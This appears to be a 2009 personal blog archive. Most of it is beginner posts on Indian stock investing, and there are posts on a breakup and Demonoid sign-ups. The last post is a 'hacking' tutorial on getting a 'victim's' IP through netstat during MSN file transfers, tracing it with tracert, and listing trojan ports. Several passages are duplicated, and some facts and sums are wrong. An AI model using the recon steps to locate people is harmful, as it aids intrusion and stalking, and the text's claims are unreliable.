You probably know the concept that all your transactions in the stock market are done though a "stockbroker". A stockbroker earns a commission on whatever transaction you make. Suppose you make a transaction of Rs.2000, and the stockbroker charges you a 3% commission, then you have to pay the stockbroker Rs.60 (3% of Rs.2000) for the transaction. So your total investment in the transaction in “not Rs.2000”. The total investment in the transaction is Rs.2060/-
So after sometime, if the price of the stocks you invested in goes up to Rs.2060 then you have not made any money because the total amount you invested was Rs.2060/-
What is more, even when you sell the stocks, you have to pay the broker brokerage of 3%. This means that, when you sell the stocks for Rs.2060, you have to pay the broker Rs.61.6 so the profit of Rs.60 you made on the transaction is gone, in fact you actually make a loss of Rs.1.6!!
So in effect even though you made a profit of Rs.60 because your stock price went up, you have actually made a loss.
If combine this with the fact that inflation reduces the value of money over time, you are just loosing money if you do not invest wisely without understanding brokerage and inflation.
Important note about brokerage: Brokers make money on whatever transaction you make. Whether you buy or sell, brokers will make money. Because brokers basically make money on transactions. Because of this, brokers tend to encourage you to trade. They don’t really care about whether you make a profit or loss. They just care about whether you are trading. The more money you are using for trading, the more they will make. Because of this, it would be wise to not blindly follow your brokers advise. The broker will give you “hot tips” etc. not because they are looking out for you and your profit, but because they are thinking about their own personal profit!
There is even one more factor that eats into your money. Tax!!!
Please note: We are not in any way encouraging you to not pay tax! We are just educating you about it.
There is a “short term capital gain tax” in our country. For a short term (less than one year) you have to pay tax on any capital gain you make though the stock market trading. How much % tax you have to pay, depends on which "tax bracket" you fall in.
Just to give you an idea. If I make Rs.100 though a transaction in the stock market, since I fall in the 33% tax bracket. It have to pay Rs.33 of that to the government!!
Please note: The government encourages you to be a long term-investor by having no long term capital gain tax. If you make a capital gain by investing for a period greater than one year, the you do not have to pay any tax on the money you make.
Now combine this short term capital gain tax with brokerage and inflation! Think about it for some time. You will almost make nothing on a small profit gains! If you want to make money out of the stock market, you must make large profit gains.
Conclusion: As a general rule, just for the sake of simplicity, your investments must grow at a minimum rate of 15% per year to stay ahead of inflation, tax and brokerage!! Remember this when making all your investments.
Wednesday, September 30, 2009
"Inflation" & how it eats your money silently & affects your investments!
Inflation, is an economic concept. What the cause of inflation is, is not important to us from the point of view of this article. What is important to us is the effect of inflation! The effect of inflation is the prices of everything going up over the years.
A movie ticket was for a few paise in my dad’s time. Now it is worth Rs.50. My dads first salary for the month was Rs.400 and over he years it has now become Rs.75,000. This is what inflation is, the price of everything goes up. Because the price goes up, the salaries go up.
If you really thing about it, inflation makes the worth of money reduce. What you could buy in my dad’s time for Rs.10, now a days you will not be able to buy for Rs.400 also. The worth of money has reduced! If this is still not clear consider this, when my father was a kid, he used to get 50paise pocket money. He used to use this money to go and watch a movie (At that time you could watch a movie for 50paise!)
Now, just for the sake of understanding assume that my dad decided in his childhood to save 50paise thinking, that one day when he becomes big, he will go for a movie. Many years pass. The year now is 2006. My dad goes to the theater and asks for a ticket. He offers the ticket-booth-guy at the theater 50paise and asks for a ticket. The ticket booth guy says, “I am sorry sir, the ticket is worth Rs.50. You will not be able to even buy a “paan” with the 50paise!!”
The moral of the story is that, the worth of the 50paise reduced dramatically. 50paise could buy a whole lot when my dad was a kid. Now, 50paise can buy nothing. This is inflation. This tells us two important things.
Firstly: Do not keep your money stagnant. If you just save money by putting it your safe it will loose value over time. If you have Rs.1000 in your safe today and you keep it there for 10years or so, it will be worth a lot less after 10 years. If you can buy something for Rs.1000 today, you will probably require Rs.1500 to buy it 10 years from now. So do not keep money locked up in your safe.
Always invest money.
If you can’t think where to invest your money, then put it in a bank. Let it grow by gaining interest. But whatever you do, do not just lock your money up in your safe and keep it stagnant. If you do this, you will be loosing money without even knowing it. The more money you keep stagnant the more money you will be loosing.Secondly: When investing, you have to make sure that the rate of return on your investment is higher than the rate of inflation.
What is the rate of inflation?
As we said earlier, the prices of everything goes up over time and this phenomenon is called inflation. The question is: By how much do the prices go up? At what rate do the prices do up?
The rate at which the prices of everything go up is called the "rate of inflation". For example, if the price of something is Rs.100 this year and next year the price becomes approximately Rs.104 then the rate of inflation is 4%. If the price of something is Rs.80 then after a year with a rate of inflation of 4% the price go up to (80 x 1.04) = 83.2
So, when you make an investment, make sure that your rate of return on the investment is higher than the rate of inflation in your country. In our county India, for the year 2005-2006 the rate of inflation was 4% (Which is really low and amazing!). This rate keeps changing every year. The finance minister generally gives the official statement on the inflation rate of the country for a particular year.
What is the rate of return?
The rate of return is how much you make on an investment. Suppose you invest Rs.100 in the market and over a year, you make Rs.120, then you rate of return is 20%.
If you invest Rs.100 in the market today and you make money at a 3% "rate of return" in one year you will have Rs.103. But now, since the rate of inflation is at 4%, an item costing Rs.100 today will cost Rs.104 a year from now. So what you can buy with today’s Rs.100, you will only be able to buy with Rs.104 a year from now.
But the Rs.100 that you invested has grown only at a 3% rate of return and so it is worth Rs.103. In effect, you are loosing money!
So in conclusion, the rate of return on your investments, have to be higher than the rate of inflation.
From the above paragraphs you can note how silently, inflation eats into your money. You would not even know about it an your money would sit loosing value for no fault of yours. But inflation is not the only thing you should be considering, there are other things too that eat into you money. The first thing is “brokerage” and the second thing is “taxation”.
PEG (Price to future growth ratio!) and what it tells you!
The market is usually more concerned about the future than the present, it is always looking for some way to figure out what is going to happen in the companies future.
A ratio that will help you look at future earnings growth is called the PEG ratio.
You calculate the PEG by taking the P/E and dividing it by the projected growth in earnings.
PEG = (P/E) / (projected growth in earnings)
For example, a stock with a P/E of 30 and projected earning growth next year of 15% would have a PEG of 30 / 15 = 2.
What does the “2” mean?
Technically speaking: The lower the PEG number, the less you pay for each unit of future earnings growth. So even a stock with a high P/E, but high projected earning growth may be a good value.
So, to put it very simply, we are interested in stocks with a low PEG value.
Just for the sake of understanding, consider this situation, you have a stock with a low P/E. Since the stock is has a low P/E, you start do wonder why the stock has a low P/E. Is it that the stock market does not like the stock? Or is it that the stock market has overlooked a stock that is actually fundamentally very strong and of good value?
To figure this out, you look at the PEG ratio. Now, if the PEG ratio is big (or close to the P/E ratio), you can understand that this is probably because the “projected growth earnings” are low. This is the kind of stock that the stock market thinks is of not much value.
On the other hand, if the PEG ratio is small (or very small as compared to the P/E ratio, then you know that it is a valuable stock) you know that the projected earnings must be high. You know that this is the kind of fundamentally strong stock that the market has overlooked for some reason.
Important note: You must understand that the PEG ratio relies on the projected % earnings. These earnings are not always accurate and so the PEG ratio is not always accurate.
Having understood these basic three ratios, you probably have started to understand how these ratios help you understand a stock and what is valuable and what is not.
In the next section we shall look at some of the things that every investor must know about. Something that SILENTLY eats into the profits of each and every investor and how to beat it...
Price to earning (P/E) ratio & what it means?
If there is one number that people look at than more any other number, it is the “Price to Earning Ratio (P/E)”. The P/E is a ratio that investors throw around with confidence as if it told the complete story. Of course, it doesn’t tell the whole story (if it did, we wouldn’t need all the other numbers.)
The P/E looks at the relationship between the stock price and the company’s earnings. The P/E is the most popular stock analysis ratio, although it is not the only one you should consider.
You calculate the P/E by taking the share price and dividing it by the company’s EPS (Earnings Per Share that we saw above)
P/E = Stock Price / EPS
For example: A company with a share price of Rs.40 and an EPS of 8 would have a P/E of: (40 / 8) = 5
What does P/E tell you?
Some investors read a high P/E as an “overpriced stock”.
However, it can also indicate the market has high hopes for this stock’s future and has bid up the price.
Conversely, a low P/E may indicate a “vote of no confidence” by the market or it could mean that the market has just overlooked the stock. Many investors made their fortunes spotting these overlooked but fundamentally strong stocks before the rest of the market discovered their true worth.
In conclusion, the P/E tells you what the market thinks of a stock. It tells you whether the market likes or dislikes the stock. If things are vague and unclear to you, do not worry. The next ratio will make everything you read till now make sense..
Earnings per share (EPS) ratio & what it means!
Even comparing the earnings of one company to another really doesn’t make any sense, if you think about it. Earnings will tell you nothing about how many shares the company has. Because you do not know how many shares a company has, you do not know how many parts that companies earnings have to be divided into. If the company has more shares, the earnings will be divided into more parts.
For example, companies A and B both earn Rs.100, but company A has 10 shares outstanding, so each share holder has in effect earned Rs.10.
On the other hand, if company B has 50 shares outstanding and they too have earned Rs.100 then each shareholder has earned Rs.2. So you see it is important to know what is the total number of outstanding shares are as well as the earnings.
Thus it makes more sense to look at earnings per share (EPS), as a comparison tool. You calculate earnings per share by taking the net earnings and divide by the outstanding shares.
EPS = Net Earnings / Outstanding Shares
So looking at the EPS ratio, you should go buy Company A with an EPS of 10, right? EPS is not the only basis of comparing two companies, but it is one of the methods used.
Note that there are three types of EPS numbers:
- Trailing EPS – last year’s numbers and the only actual EPS
- Current EPS – this year’s numbers, which are still projections
- Forward EPS – future numbers, which are obviously projections
Stock Picking - Which stocks to buy?
Having understood all the basics of the stock market and the risk involved, now we will go into stock picking and how to pick the right stock. Before picking the right stock you need to do some analysis.
There are two major types of analysis:
1. Fundamental Analysis
2. Technical Analysis
Fundamental analysis is the analysis of a stock on the basis of core financial and economic analysis to predict the movement of stocks price.
On the other hand, technical analysis is the study of prices and volume, for forecasting of future stock price or financial price movements.
Simply put, fundamental analysis looks at the actual company and tries to figure out what the company price is going to be like in the future. On the other hand technical analysis look at the stocks chart, peoples buying behavior etc. to try and figure out what the stock price is going to be like in the future.
In this article we will go into the basics of “fundamental analysis”. Technical analysis is a little more complicated. It is much more of an "art" than a science.
There are two major types of analysis:
1. Fundamental Analysis
2. Technical Analysis
Fundamental analysis is the analysis of a stock on the basis of core financial and economic analysis to predict the movement of stocks price.
On the other hand, technical analysis is the study of prices and volume, for forecasting of future stock price or financial price movements.
Simply put, fundamental analysis looks at the actual company and tries to figure out what the company price is going to be like in the future. On the other hand technical analysis look at the stocks chart, peoples buying behavior etc. to try and figure out what the stock price is going to be like in the future.
In this article we will go into the basics of “fundamental analysis”. Technical analysis is a little more complicated. It is much more of an "art" than a science.
important things you must know and follow as an new investor!
You need to KNOW some “unforgettable basics” before you enter the world of investing in stocks. The stock market is a field dominated by savvy investors who know the ins-and-outs of the market. For people who are not “on the inside”, the stock market can be a VERY dangerous place. :
Don't even consider "tips" that tell you about "hot stocks". Consider the source: There are many people in the market who put in all their time and effort in promoting certain stocks. They do this because they have their money invested in those stocks. If they can get enough people to buy the stock and they can get the stock price to rise, they will sell the stock for a huge price, the stock price will crash and they will walk off to promote another stock.
Always use your own brain: It's extremely important. You must always use your own brain. Relying on the advice of others, no matter how well intentioned it may be, is almost always a complete disaster. Make sure you dig in and really examine the "facts about the companies" before you invest. Ignore press releases which have very little substance, and rely on "hype" to tell the company's story.
And finally the most important tip!!!
Only invest money you can afford to lose!! Sure this is a basic point, but many many people miss it. You should only invest money that you can honestly afford to lose!! Everyone enters into investments with the idea of earning big profits, but in many cases, this never works. (Especially if you are new to investing in the stock market!)
Please understand that the above tips are tips for beginners. Once you really get into the stock market you do not need to follow these rules anymore. But if you are a new investor, you MUST follow these rules. They are for your own safety.
But then again, nothing comes free. Everything has a price. You will have to loose some money, make some bad decisions and then only will you really understand the market. You cannot understand the market by just looking at it from far. By following these rules, you will basically not loose too much!
Don't even consider "tips" that tell you about "hot stocks". Consider the source: There are many people in the market who put in all their time and effort in promoting certain stocks. They do this because they have their money invested in those stocks. If they can get enough people to buy the stock and they can get the stock price to rise, they will sell the stock for a huge price, the stock price will crash and they will walk off to promote another stock.
Always use your own brain: It's extremely important. You must always use your own brain. Relying on the advice of others, no matter how well intentioned it may be, is almost always a complete disaster. Make sure you dig in and really examine the "facts about the companies" before you invest. Ignore press releases which have very little substance, and rely on "hype" to tell the company's story.
And finally the most important tip!!!
Only invest money you can afford to lose!! Sure this is a basic point, but many many people miss it. You should only invest money that you can honestly afford to lose!! Everyone enters into investments with the idea of earning big profits, but in many cases, this never works. (Especially if you are new to investing in the stock market!)
Please understand that the above tips are tips for beginners. Once you really get into the stock market you do not need to follow these rules anymore. But if you are a new investor, you MUST follow these rules. They are for your own safety.
But then again, nothing comes free. Everything has a price. You will have to loose some money, make some bad decisions and then only will you really understand the market. You cannot understand the market by just looking at it from far. By following these rules, you will basically not loose too much!
What are the Sensex & the Nifty?
The Sensex is an "index". What is an index? An index is basically an indicator. It gives you a general idea about whether most of the stocks have gone up or most of the stocks have gone down.
The Sensex is an indicator of all the major companies of the BSE.
The Nifty is an indicator of all the major companies of the NSE.
If the Sensex goes up, it means that the prices of the stocks of most of the major companies on the BSE have gone up. If the Sensex goes down, this tells you that the stock price of most of the major stocks on the BSE have gone down.
Just like the Sensex represents the top stocks of the BSE, the Nifty represents the top stocks of the NSE.
Just in case you are confused, the BSE, is the Bombay Stock Exchange and the NSE is the National Stock Exchange. The BSE is situated at Bombay and the NSE is situated at Delhi. These are the major stock exchanges in the country. There are other stock exchanges like the Calcutta Stock Exchange etc. but they are not as popular as the BSE and the NSE.Most of the stock trading in the country is done though the BSE & the NSE.
Besides Sensex and the Nifty there are many other indexes. There is an index that gives you an idea about whether the mid-cap stocks go up and down. This is called the “BSE Mid-cap Index”. There are many other types of indexes.
There is an index for the metal stocks. There is an index for the FMCG stocks. There is an index for the automobile stocks etc.
The Sensex is an indicator of all the major companies of the BSE.
The Nifty is an indicator of all the major companies of the NSE.
If the Sensex goes up, it means that the prices of the stocks of most of the major companies on the BSE have gone up. If the Sensex goes down, this tells you that the stock price of most of the major stocks on the BSE have gone down.
Just like the Sensex represents the top stocks of the BSE, the Nifty represents the top stocks of the NSE.
Just in case you are confused, the BSE, is the Bombay Stock Exchange and the NSE is the National Stock Exchange. The BSE is situated at Bombay and the NSE is situated at Delhi. These are the major stock exchanges in the country. There are other stock exchanges like the Calcutta Stock Exchange etc. but they are not as popular as the BSE and the NSE.Most of the stock trading in the country is done though the BSE & the NSE.
Besides Sensex and the Nifty there are many other indexes. There is an index that gives you an idea about whether the mid-cap stocks go up and down. This is called the “BSE Mid-cap Index”. There are many other types of indexes.
There is an index for the metal stocks. There is an index for the FMCG stocks. There is an index for the automobile stocks etc.
What makes stock prices go "up" and "down"?
Stock prices change every day because of market forces. By this we mean that stock prices change because of “supply and demand”. If more people want to buy a stock (demand) than sell it (supply), then the price moves up!
Conversely, if more people wanted to sell a stock than buy it, there would be greater supply than demand, and the price would fall. (Basics of economics!)
Understanding supply and demand is easy. What is difficult to understand is what makes people like a particular stock and dislike another stock. If you understand this, you will know what people are buying and what people are selling. If you know this you will know what prices go up and what prices go down!
To figure out the likes and dislikes of people, you have to figure out what news is positive for a company and what news is negative and how any news about a company will be interpreted by the people.
The most important factor that affects the value of a company is its earnings. Earnings are the profit a company makes, and in the long run no company can survive without them. It makes sense when you think about it. If a company never makes money, it isn't going to stay in business. Public companies are required to report their earnings four times a year (once each quarter).
Dalal Street watches with great attention at these times, which are referred to as earnings seasons. The reason behind this is that analysts base their future value of a company on their earnings projection.
Of course, it's not just earnings that can change the feeling people have about a stock. It would be a rather simple world if this were the case! During the “dotcom bubble”, for example, the stock price of dozens of internet companies rose without ever making even the smallest profit. As we all know, these high stock prices did not hold, and most internet companies saw their values shrink to a fraction of their highs. Still, this fact demonstrates that there are factors other than current earnings that influence stocks.
So, what are "all the factors" that affect the stocks price? The best answer is that nobody really knows for sure. Some believe that it isn't possible to predict how stock prices will change, while others think that by drawing charts and looking at past price movements, you can determine when to buy and sell. The only thing we do know is that stocks are volatile and can change in price very very rapidly.
Just remember this: At the most fundamental level, supply and demand in the market determines stock price.
There are many types of techniques and methods that investors use to figure out whether a stock price will go up or down!
Why does a company issue stocks?
Why would the founders share the profits with thousands of people when they could keep profits to themselves? The reason is that at some point every company needs to "raise money". To do this, companies can either borrow it from somebody or raise it by selling part of the company, which is known as issuing stock.
A company can borrow by taking a loan from a bank or by issuing bonds. Both methods come under "debt financing". On the other hand, issuing stock is called “equity financing”. Issuing stock is advantageous for the company because it does not require the company to pay back the money or make interest payments along the way.
All that the shareholders get in return for their money is the hope that the shares will someday be worth more than what they paid for them. The first sale of a stock, which is issued by the private company itself, is called the initial public offering (IPO).
It is important that you understand the distinction between a company financing through debt and financing through equity. When you buy a debt investment such as a bond, you are guaranteed the return of your money (the principal) along with promised interest payments.
This isn't the case with an equity investment. By becoming an owner, you assume the risk of the company not being successful - just as a small business owner isn't guaranteed a return, neither is a shareholder. Shareholders earn a lot if a company is successful, but they also stand to lose their entire investment if the company isn't successful.
It’s a tricky game!
Note that: There are no guarantees when it comes to individual stocks. Some companies pay out dividends, but many others do not. And there is no obligation to pay out dividends. Without dividends, an investor can make money on a stock only through its appreciation of the stock price in the open market.
On the downside, any stock may go bankrupt, in which case your investment is worth nothing.
How to make money in the stock market?
Inroduction
This article is a COMPLETE guide to the basics of making money in the stock market! If you are considering investing in the stock market, you MUST read this article! We have explained all the concepts and talked about all the "myths" that people have about the stock market!
What are stocks?
Plain and simple, a “stock” is a share in the ownership of a company.
A stock represents a claim on the company's assets and earnings. As you acquire more stocks, your ownership stake in the company becomes greater.
Note: Some times different words like shares, equity, stocks etc. are used. All these words mean the same thing.
So what does ownership of a company give you?
Holding a company's stock means that you are one of the many owners (shareholders) of a company and, as such, you have a claim to everything the company owns.
This means that technically you own a tiny little piece of all the furniture, every trademark, and every contract of the company. As an owner, you are entitled to your share of the company's earnings as well.
These earnings will be given to you. These earnings are called “dividends” and are given to the shareholders from time to time.
A stock is represented by a "stock certificate". This is a piece of paper that is proof of your ownership. However, now-a-days you could also have a “demat” account. This means that there will be no “stock certificates”. Everything will be done though the computer electronically. Selling and buying stocks can be done just by a few clicks.
Being a shareholder of a public company does not mean you have a say in the day-to-day running of the business. Instead, “one vote per share” to elect the board of directors of the company at annual meetings is all you can do. For instance, being a Microsoft shareholder doesn't mean you can call up Bill Gates and tell him how you think the company should be run.
The management of the company is supposed to increase the value of the firm for shareholders. If this doesn't happen, the shareholders can vote to have the management removed. In reality, individual investors like you and I don't own enough shares to have a material influence on the company. It's really the big boys like large institutional investors and billionaire entrepreneurs who make the decisions.
For ordinary shareholders, not being able to manage the company isn't such a big deal. After all, the idea is that you don't want to have to work to make money, right? The importance of being a shareholder is that you are entitled to a portion of the company’s profits and have a claim on assets.
Profits are sometimes paid out in the form of dividends as mentioned earlier. The more shares you own, the larger the portion of the profits you get. Your claim on assets is only relevant if a company goes bankrupt. In case of liquidation, you'll receive what's left after all the creditors have been paid.
Another extremely important feature of stock is "limited liability", which means that, as an owner of a stock, you are "not personally liable" if the company is not able to pay its debts.
In other legal structures such as partnerships, if the partnership firm goes bankrupt the creditors can come after the partners “personally” and sell off their house, car, furniture, etc.
Owning stock means that, no matter what happens to the company, the maximum value you can lose is the value of your stocks. Even if a company of which you are a shareholder goes bankrupt, you can never lose your personal assets.
Why would the founders share the profits with thousands of people when they could keep profits to themselves?.
Saturday, August 15, 2009
HoW tO ReCover FrOm loVe failUre
The Lovely answer i found in internet For Love FailUre Is
Assuming you sit for an examination with 20 questions. Supposing Q.5 is tough and you don't know the answer. What would you do? Do you wait for an answer for Q.5 and don't answer the rest of the questions? I'm sure you would move on to Q.6 to 20 and then come back to Q.5, right?
Likewise, sometimes in life we may have some problems which don't have an answer yet. Don't wait till eternity for an answer.
Move on with the rest of life, studies, work, travel, leisure, hobby, friends, family even internet chat etc.
Instead of focussing too hard at her current 'problem' at hand, I guess it is wiser to look away from that spot (the problem) for a moment and then come back too it later.
Sometimes a little bit of procrastination is good.
Perhaps while involved in the other activities; she may get an answer.
Sometimes, some problems (especially problems related to heart) have funny ways of solving itself.
Special Thanks To the Fellow Named JenY For Giving An WounderFull Answer..
Assuming you sit for an examination with 20 questions. Supposing Q.5 is tough and you don't know the answer. What would you do? Do you wait for an answer for Q.5 and don't answer the rest of the questions? I'm sure you would move on to Q.6 to 20 and then come back to Q.5, right?
Likewise, sometimes in life we may have some problems which don't have an answer yet. Don't wait till eternity for an answer.
Move on with the rest of life, studies, work, travel, leisure, hobby, friends, family even internet chat etc.
Instead of focussing too hard at her current 'problem' at hand, I guess it is wiser to look away from that spot (the problem) for a moment and then come back too it later.
Sometimes a little bit of procrastination is good.
Perhaps while involved in the other activities; she may get an answer.
Sometimes, some problems (especially problems related to heart) have funny ways of solving itself.
Special Thanks To the Fellow Named JenY For Giving An WounderFull Answer..
Sunday, April 19, 2009
Demonoid Registrations Are Opened
Hi
Demonoid Register Servers ARe open Today .So hurry and Goto below site and make a new Demonoid Id ..
Register
Demonoid Register Servers ARe open Today .So hurry and Goto below site and make a new Demonoid Id ..
Register
Sunday, March 29, 2009
Info About Ip And Trace It
Getting the IP or Internet Protocol of a remote system is the most important and the first step of hacking into it. Probably it is the first thing a hacker do to get info for researching on a system. Well IP is a unique number assigned to each computer on a network. It is this unique address which represents the system on the network. Generally the IP of a particular system changes each time you log on to the network by dialing to your ISP and it is assigned to you by your ISP. IP of a system which is always on the network remains generally the same. Generally those kind of systems are most likely to suffer a hacking attack because of its stable IP. Using IP you can even execute system commands on the victim’s computer.
Lets take the example of the following IP address: 202.144.49.110 Now the first part, the numbers before the first decimal i.e. 209 is the Network number or the Network Prefix.. This means that it identifies the number of the network in which the host is. The second part i.e. 144 is the Host Number that is it identifies the number of the host within the Network. This means that in the same Network, the network number is same. In order to provide flexibility in the size of the Network, here are different classes of IP addresses:
Address Class Dotted Decimal Notation Ranges
Class A ( /8 Prefixes) 1.xxx.xxx.xxx through 126.xxx.xxx.xxx
Class B ( /16 Prefixes) 128.0.xxx.xxx through 191.255.xxx.xxx
Class C ( /24 Prefixes) 192.0.0.xxx through 223.255.255.xxx
The various classes will be clearer after reading the next few lines.
Each Class A Network Address contains a 8 bit Network Prefix followed by a 24-bit host number. They are considered to be primitive. They are referred to as "/8''s" or just "8's" as they have an 8-bit Network prefix.
In a Class B Network Address there is a 16 bit Network Prefix followed by a 16-bit Host number. It is referred to as "16's".
A class C Network address contains a 24-bit Network Prefix and a 8 bit Host number. It is referred to as
"24's" and is commonly used by most ISP's.
Due to the growing size of the Internet the Network Administrators faced many problems. The Internet routing tables were beginning to grow and now the administrators had to request another network number from the Internet before a new network could be installed at their site. This is where sub-netting came in.
Now if your ISP is a big one and if it provides you with dynamic IP addresses then you will most probably see that whenever you log on to the net, your IP address will have the same first 24 bits and only the last 8 bits will keep changing. This is due to the fact that when sub-netting comes in then the IP Addresses structure becomes:
xxx.xxx.zzz.yyy
where the first 2 parts are Network Prefix numbers and the zzz is the Subnet number and the yyy is the host number. So you are always connected to the same Subnet within the same Network. As a result the first 3 parts will remain the same and only the last part i.e. yyy is variable.
***********************
For Example, if say an ISP xyz is given the IP: 203.98.12.xx Network address then you can be awarded any IP, whose first three fields are 203.98.12. Get it?
So, basically this means that each ISP has a particular range in which to allocate all its subscribers. Or in other words, all subscribers or all people connected to the internet using the same ISP, will have to be in this range. This in effect would mean that all people using the same ISP are likely to have the same first three fields of their IP Addresses.
This means that if you have done a lot of (By this I really mean a lot) of research, then you could figure out which ISP a person is using by simply looking at his IP. The ISP name could then be used to figure out the city and the country of the person. Right? Let me take an example to stress as to how cumbersome but easy (once the research is done) the above method can be.
In my country, say there are three main ISP’s:
ISP Name Network Address Allotted
ISP I 203.94.47.xx
ISP II 202.92.12.xx
ISP III 203.91.35.xx
Now, if I get to know the IP of an e-pal of mine, and it reads: 203.91.35.12, then I can pretty easily figure out that he uses ISP III to connect to the internet. Right? You might say that any idiot would be able to do this. Well, yes and no. You see, the above method of finding out the ISP of a person was successful only because we already had the ISP and Network Address Allotted list with us. So, what my point is, that the above method can be successful only after a lot of research and experimentation. And, I do think such research can be helpful sometimes.
Also, this would not work, if you take it all on in larger scale. What if the IP that you have belongs to someone living in a remote igloo in the North Pole? You could not possibly get the Network Addresses of all the ISP’s in the world, could you? If yes please send it to me J.
Well now I guess you have pretty good knowledge about what an IP is and what you can do by knowing the IP of a remote system. Now lets come to the point of finding out the IP of remote system.
Well you can easily figure out the IP of a remote system using the netstat utility available in the microsoft’s version of DOS. The netstat command shows the connections in which your system is engaged to and the ports they are using. Suppose you are checking your mail in hotmail and you want to find out the IP of msn. All you need to do is to open a dos window (command.com) and type netstat. You will see all the open connections of your system. There you will see something :
Proto Local Address Foreign Address State
TCP abhisek:1031 64.4.xx.xx:80 ESTABLISHED
Now you got the IP address of hotmail ass 64.4.xx.xx .
Similarly you can figure out the IP address of most http or ftp connections.
To know your own IP type the following command in a dos windows
C:\netstat –n
[this commands converts the IP name into IP addresses]
this is what you will probably see on typing the above command :
Proto Local Address Foreign Address State
TCP 203.xx.251.161:1031 194.1.129.227:21 ESTABLISHED
TCP 203.xx.251.161:1043 207.138.41.181:80 FIN_WAIT_2
TCP 203.xx.251.161:1053 203.94.243.71:110 TIME_WAIT
TCP 203.xx.251.161:1058 194.1.129.227:20 TIME_WAIT
TCP 203.xx.251.161:1069 203.94.243.71:110 TIME_WAIT
TCP 203.xx.251.161:1071 194.98.93.244:80 ESTABLISHED
TCP 203.xx.251.161:1078 203.94.243.71:110 TIME_WAIT
Here 203.xx.251.161 is your IP address.
Now lets clarify the format used by netstat :
Proto : It shows the type of protocol the connection with the remote system is using.
Here TCP (transmission control protocol) is the protocol used by my system to connect to other systems.
Local Address : It shows the local address ie the local IP. When the netstat command is executed without –n switch then the name of the local system is displayed and when the netstat is executed with –n switch then the IP of the local system is displayed. Here you can also find out the port used by the connection.
xxx.yyy.zzz.aaa:1024
in this format you will see the local address. Here 1024 is the port to which the remote system is connected in your system
Foreign Address :: It shows the IP address of the remote system to which your system is connected. In this case also if the netstat command is excuted with –n switch then you directly get the IP of the victim but if the netstat is executed without –n switch then you will get the address of the remote system. Something like
C:\netstat
Proto Local Address Foreign Address State
TCP abhisek:1031 msgr.lw4.gs681.hotmail.com:80 ESTABLISHED
Here msgr.lw4.gs681.hotmail.com is the address of the foreign system . putting this address in any IP lookup program and doing a whois lookup will reveal the IP of the remote system.
Note: The port to which your system is connected can be found from this in the same way as I have shown in the case of local address. The difference is that, this is the port of the remote system to which your computer is connected to.
Below I have produced a list of ports and popular services generally found to be running.
21 :: FTP port
80 :: http port
23 :: Telnet port
Note: If your execute the netstat command and find ports like 12345,27374 are open and are in use then make it sure that your sweat heart computer is infected with her boyfriend.. J J J J I mean your computer is infected with some sort of Trojan.
Below I have produced a list of commonly known Trojans and the ports they use by default. So if you find these ports open then get a good virus buster and get these stupid servers of the Trojans kicked out. Well if you want to play with these Trojan by keeping them in your computer but not letting them ruin your system performance then just disble it from the system registry run and they wont be loaded to memory each time when windows starts up[This trick doesn’t work for all Trojans].
Netbus :: 12345(TCP)
Subseven :: 27374(TCP)
Girl Friend :: 21554(TCP)
Back Oriface :: 31337 (UDP)
Well guys and gals I hope you are now well familiar with the term IP and what is the utility of IP in cyber world and how to get the IP of a remote system to which you are connected. I hope you find my writings very easy to undertstand. I know I lack the capacity of explaining myself but I try my level best to make things very easy and clear for you’ll.
This is a tutorial on how to get IP address from MSN messenger. This is actually
a really easy thing to do. It is not like going through the hard time and reversing
MSN messenger like many people think.
The IP address is only given when you accept or are sending a file through MSN
messenger. When you send IM's, the message is sent through the server thus hiding
your victims IP and your. But when you send a file or recieve a file, it is direct
connection between the two computers.
To obtain the IP accept a file transfer or send a file to the victim, when the file
sending is under way from the dos prompt type "netstat" without the quotation marks.
You should get a table like this:
Proto Local Address Foreign Address State
TCP kick:1033 msgr-ns29.msgr.hotmail.com:1863 ESTABLISHED
TCP kick:1040 msgr-sb36.msgr.hotmail.com:1863 ESTABLISHED
TCP kick: ESTABLISHED
The top name in the list is the server's address for IMing. There could be many of
the second name in the list, as a new connection is made to the server for every
room you are IMing to. You are looking for the address of the remote host in
this table it may be something similar to "host63-7-102-226.ppp.cal.vsnl.com" or “203..64.90.6”.
without the quotation marks.
All you need to do now is to put this address in you IP lookup programe and get the IP of the remote system.
Well 50%of the work is done now. Now you know how to get the IP of a remote system, so its time to trace it down and find some details about the IP.
Tracing an IP is quite simple. You can do it the easy way by using some sweet softwares like Visual Trace 6.0b
[ftp://ftp.visualware.com/pub/vr/vr.exe]
Neotrace
[http://www.neoworx.com/download/NTX325.exe]
or by our way ie. Using MS DOS or any other version of DOS.
Well I suggest you to use DOS and its tracert tool for tracing the IP cause using it will give you a clear conception about the art of tracing an IP and I guarantee that you will feel much satisfied on success than using a silly software. Furthur you will know how things work and how the IP is traced down and the different networks associated in this tracing process.
Let us take a look at tracert tool provided for DOS by Microsoft.
It is a very handy tool for peoples need to trace down an IP.
Just open any DOS windows and type tracert.
C:\windows>tracert
Usage: tracert [-d] [-h maximum_hops] [-j host-list] [-w timeout] target_name
Options:
-d Do not resolve addresses to hostnames.
-h maximum_hops Maximum number of hops to search for target.
-j host-list Loose source route along host-list.
-w timeout Wait timeout milliseconds for each reply.
You will now see a description of the tracert command and the switches associated with it.
Well these switches doesn’t makes much difference. All you can do is to increase the timeout in milliseconds by using –w switch if you are using a slow connection and the –d switch if you wish not resolve address to hostnames by default.
By default tracert performs a maximum of 30 hops trace. Using the –h switch you can specify the number of hops to perform.
Now its time for execution.
Let us trace down the IP yahoo.com [216.115.108.243]
TIP: If you have done a long research (I mean a lot) then simply looking at the IP you can figure out some info from it. For example the IP 203.90.68.8 indicates that the system is in India. In India IPs generally begin with 203 and 202
C:\WINDOWS>tracert yahoo.com
Tracing route to yahoo.com [216.115.108.243] over a maximum of 30 hops:
1 308 ms 142 ms 127 ms 203.94.246.35
2 140 ms 135 ms * 203.94.246.1
3 213 ms 134 ms 132 ms 203.94.255.33
4 134 ms 130 ms 129 ms 203.200.64.29
5 122 ms 135 ms 131 ms 203.200.87.75
6 141 ms 137 ms 121 ms 203.200.87.15
7 143 ms 170 ms 154 ms vsb-delhi-stm1.Bbone.vsnl.net.in [202.54.2.241]
8 565 ms 589 ms 568 ms if-7-0.bb8.NewYork.Teleglobe.net [207.45.198.65]
9 596 ms 584 ms 600 ms if-3-0.core2.NewYork.teleglobe.net [207.45.221.66]
10 * * * Request timed out.
11 703 ms 701 ms 719 ms if-3-0.core2.PaloAlto.Teleglobe.net [64.86.83.205]
12 694 ms 683 ms 681 ms if-6-1.core1.PaloAlto.Teleglobe.net [207.45.202.33]
